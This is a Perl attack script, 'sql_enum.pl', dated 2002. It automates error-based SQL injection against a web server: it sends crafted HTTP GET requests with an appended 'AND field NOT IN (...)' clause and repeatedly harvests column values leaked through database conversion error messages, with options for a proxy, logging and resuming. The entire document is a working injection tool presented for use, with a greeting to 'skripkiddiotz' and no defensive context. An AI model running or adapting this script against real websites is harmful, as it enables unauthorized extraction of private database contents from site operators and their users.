#!/usr/bin/perl -w

# sql_enum.pl
# meling@scan-associates.net 16/Apr/2002
# a simple script to automatically 'enumerates' sql database
# greetz: scanners and skripkiddiotz

use IO::Socket;
use Getopt::Std;

my $VERSION = "0.1";
my $request = "";
my $qry = "";

# target does not really do anything
sub usage {
	print STDERR qq {
--$0 v$VERSION--
Usage: $0 -t <target> -f <file> -F <field_nam> [options] where options are:
	-p = <proxy's IP> 
	-P = <proxy port> 
	-l = <log file - output result here> 
	-c = <continue from last query>
};
	exit 255;
}

getopts("t:f:F:p:P:l:c", \%args);

if (!$args{t}) { die "No target specified\n"; } 
if (!$args{f}) { die "No file specified\n"; } 
if (!$args{F}) { die "No field name specified\n"; } 

if ($args{p} && !$args{P}) { die "\nPlease specify the proxy port!\n"; }
if (!$args{p} && $args{P}) { die "\nNo proxy IP is specified!\n"; }

my $proxy_ip = "";
my $proxy_port = "";
if ($args{p} && $args{P}) { 
	my $pip = gethostbyname($args{p});
	if (length($pip) <= 0) {
		die "Can't resolve the proxy!\n";
	} else {
		$proxy_ip = $pip;
		$proxy_port = $args{P};
	}
} else {
	$proxy_ip = $args{t};
	$proxy_port = "80";
}

my $file = $args{f};
my $target = $args{t};
my $field = $args{F};
my $lfile = $args{l};

if (!defined($file)) { die "No file specified\n"; }
open(F, $file) or die "Can't open $file!\n";
if ($args{l}) { open(LOGFILE, ">>$lfile") or die "Can't create file\n"; }

# no support for multiple targets yet
while (my $line = <F>) { chomp $line; $qry = $line; }
close(F);

sub send_query 
{

	my $result = "";
	my $data = "";
	my $blu = "";
	my $request = shift @_;
	select (STDOUT); $|=1;
	socket(S,PF_INET,SOCK_STREAM, getprotobyname('tcp') || 0) or die "Socket\n";
	select (S); $|=1;
	select (STDOUT);

	if (connect(S,pack "SnA4x8",2,$proxy_port,$proxy_ip)) {
		print S $request;
		sleep 1;
		shutdown S, 1;
		while(my $bla = <S>) {
			$data .= $bla;
		}
		if ($data =~ /Syntax error/) {
			$blu = $data;
			if ($blu =~ /value\s+(\'\S*\')\s+to/) {
				$result = $1;
			} else {
				print "Error: $blu\n\n";
				$result = "31337";
			}
		} else {
			print LOGFILE "Last request sent was:\n\n";
			print LOGFILE "$request\n\n";
			print LOGFILE "The enumerator encoutered the ";
			print LOGFILE "error\n\n";
			print LOGFILE $data;
			die ("An error occured\n");
			close(S);
		}
	} else {
		die "connection problems\n";
		close(S);
	}
	close(S);
	return $result;
} 

$request = 
"GET $qry-- HTTP/1.1\r\n".
"Host: $target\r\n".
"Accept: */*\r\n".
"\r\n";

if (!$args{c}) {
	my $new_qry = "%20AND%20$field%20NOT%20IN%20(";
	$qry .= $new_qry;
}

print "Sending first query: $request\n\n";

my $i = 0;
my $res = "";

while (($res = send_query($request)) ne "31337") {
	$i++;
	$qry .= "$res";

	print LOGFILE "[$i] $res\n";
	print "[$i] $res\n";

	# quick and easy way to make sure the query is valid
		
	if ($qry =~ /convert/ or $qry =~ /CONVERT/) {
		$qry =~ s/\)\)//;
		$qry .= ")))";
	} else {
		$qry .= ")";
	}
	
	#}
	$qry =~ s/\'\)\'/\'\,\'/;

	print "Sending query $i: $qry\n\n";

	$request = 
	"GET $qry-- HTTP/1.1\r\n" .
	"Host: $target\r\n" .
	"Accept: */*\r\n" .
	"\r\n";
	$res = send_query($request);
}